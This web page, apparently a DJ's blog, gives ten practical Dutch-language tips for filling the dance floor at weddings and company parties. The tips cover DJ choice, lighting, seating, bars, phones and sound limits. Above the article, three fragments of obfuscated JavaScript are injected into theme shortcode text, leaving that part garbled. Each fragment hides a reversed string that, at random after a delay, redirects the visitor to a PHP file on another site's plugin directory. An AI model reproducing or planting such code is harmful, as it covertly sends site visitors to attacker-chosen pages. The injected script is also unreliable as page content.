Project Description

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top=”” margin_bottom=”” padding_top=”” padding_right=”” padding_bottom=”” padding_left=””]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top” background_repeat=”no-repeat” hover_type=”none” border_size=”0″ border_color=”” border_style=”solid” border_position=”all” padding_top=”” padding_right=”” padding_bottom=”” padding_left=”” margin_top=”” margin_bottom=”” animation_type=”” animation_direction=”left” animation_speed=”0.3″ animation_offset=”” last=”no”]

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top=”” margin_bottom=”” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” class=”” id=”” size=”1″ content_align=”left” style_type=”default” sep_color=””]

10 TIPS VOOR EEN VOLLE DANSVLOER

Een volle dansvloer op jullie huwelijk of bedrijfsfeest, daar droomt toch iedereen van?
Onderstaande opsomming lijkt banaal maar je zal zien, er zit logica in 😉

1. Volle dansvloer

Dé gouden tip die ik jullie meegeven, sta zelf op de dansvloer! De genodigden komen voor jullie, als jullie op de dansvloer staan werkt dit “magnetisch” en loopt de dansvloer met genodigden automatisch vol. Zijn jullie nergens te bespeuren, zie je in vele gevallen het omgekeerde …

2. De dj maakt of kraakt het feest

Boek de juiste DJ voor het juiste event. Boek geen house dj voor een ambiance feest en omgekeerd. Dag van vandaag is het woord “DJ” breed te omschrijven, 1h hitjes draaien lukt velen, een hele avond de genodigden, verschillend van leeftijd, animeren vraagt meer ervaring. Op de meeste facebook pagina’s, websites van de dj is duidelijk te zien voor welke stijl de dj gaat. Bezorg de DJ een lijstje met een aantal nummers die jullie zeker (niet) willen horen, geef de dj ruimte.

3. Verlichting

Bekijk op voorhand waar de algemene verlichting van de zaal zit en welke lichten volledig uit kunnen of dimmen. Te donker is niet leuk, te veel licht ook niet. Een imposante luster boven de dansvloer is knap maar als het licht niet uit kan op het moment van de dans, komt dit niet goed. Laat de verlichting van de discobar z’n werk doen, dit is ervoor gemaakt. Uplighters langs de muren geven het event ook altijd een meerwaarde.

4. Dansvloer

Liever een te kleine dansvloer waar het wrikkelen is voor een plaatsje dan een grote open vlakte waar je moederziel alleen staat.

5. Genodigden

Bekijk op voorhand de lijst met genodigden, jullie kennen hen persoonlijk en redeneer, dit wordt een stevig feestje als we die vrienden, familie uitnodigen. Opmerking, de juiste dj op jullie event is zeer belangrijk, maar een goed danspubliek is dit zeker ook! De DJ draait muziek, hij kan niet toveren 😉

6. Tafelschikking

Heel veel respect voor de grootouders, maar zet hen niet op de eerste rij juist voor de boxen. Als het dansfeest nog niet begonnen en er staat achtergrond muziek aan tafel en de grootouders hebben al 3x een handbeweging gemaakt richting Dj en verschillende maal gevraagd om de muziek stiller te zetten, dan komt dit niet goed. Zet de tafel met jongeren vooraan, je zal zien dat dit heel wat vlotter werkt.

7. Discobar vs Bar

Plaats deze 2 niet ver uiteen. niet voor mezelf, maar in vele gevallen zie ik de heren vlot richting toog gaan en de dames op dansvloer. Zet deze 2 “bars” kort bijeen en de party knalt!

8. Smartphone vs dansvloer

“No mobiles on the dancefloor please, it kills the vibes and makes you look like a boring bastard” Dit klink hard maar er zit waarheid in. Ik zie regelmatig mensen  stil staan op de dansvloer en hun social media, mails checken, als je het mij vraagt, niet het moment 🙂  of nonkel frans die volledig losgaat op Billie Jean van Michael Jackson, iedereen verschiet en spontaan komen de smartphones boven om dit te filmen. Gevolg, 5 seconden later staat de nonkel frans stil en gaat terug naar zijn plaats, in het voorbeeld is nonkel frans dokter en wil hij niet dat z’n moonwalk moves online gaan, spijtig want dit had het feest wel een stevige boost gegeven. Smartphones kun je niet bannen en jullie kunnen niet beslissen wie z’n smartphone bovenhaalt, maar het voorbeeld is wellicht duidelijk.

9. Dansvloer afleiders

Eenmaal de dans gestart is het niet nodig de genodigden bezig te houden aan tafel. Een gezellige rondgang en babbel aan iedere tafel kan gerust voor de dans. Het uitdelen van bedankingskaartjes of attributen tijdens de dans is zeker ook niet bevorderend voor een volle dansvloer. Ik wil de rokers niet benadelen, maar zet geen extra zetels of verwarmers buiten, hoe meer personen buiten, hoe minder volk op de dansvloer. Zet de flitspaal aan de zijkant of centraal in de zaal waar er gedanst wordt. Genodigden doen altijd zot voor die paal, dit zorgt voor sfeer, combineer dit met de dansvloer. Als de paal volledig weg van de dansvloer of uit de zaal staat heb je heel wat volk weg van de dansvloer.

10. Verplicht gebruik geluidsinstallatie van de zaal

In heel wat zalen wordt de DJ verplicht zijn controller en laptop aan te sluiten aan de geluidsinstallatie van de zaal. Het voordeel daarvan is dat in vele gevallen de boxen mooi weggewerkt zijn in het interieur en dat de klank mooi verdeeld is. Het nadeel van verplicht aan te koppelen is dat de geluidsinstallatie in vele gevallen gelimiteerd is en de dj het algemeen volume niet in de hand heeft. In sommige zaken is het maximum geluidsvolume gelimiteerd tot 85 – 90 db. Om volledig los te gaan op een dansfeest is dit niet voldoende! De muziek moet niet LUID staan, maar je hebt wel een bepaald volume nodig om de genodigden te laten dansen. Kort samengevat, een groep van 100 genodigden babbelen luider dan de muziek van de discobar, gevolg = ambiance 0,0 spijtig! Iedereen kijkt naar de dj maar hij kan er ook niets aan doen. Als de geluidsinstallatie van de zaal verplicht te gebruiken is, is dit geen nadeel maar vraag referenties na aan vrienden, collega’s, internet fora, … de geluidsinstallatie testen in een lege zaal is geen referentie! Er zijn natuurlijk ook locaties waar zeer goede geluidsinstallaties aanwezig zijn, dit is zeker het vermelden waard.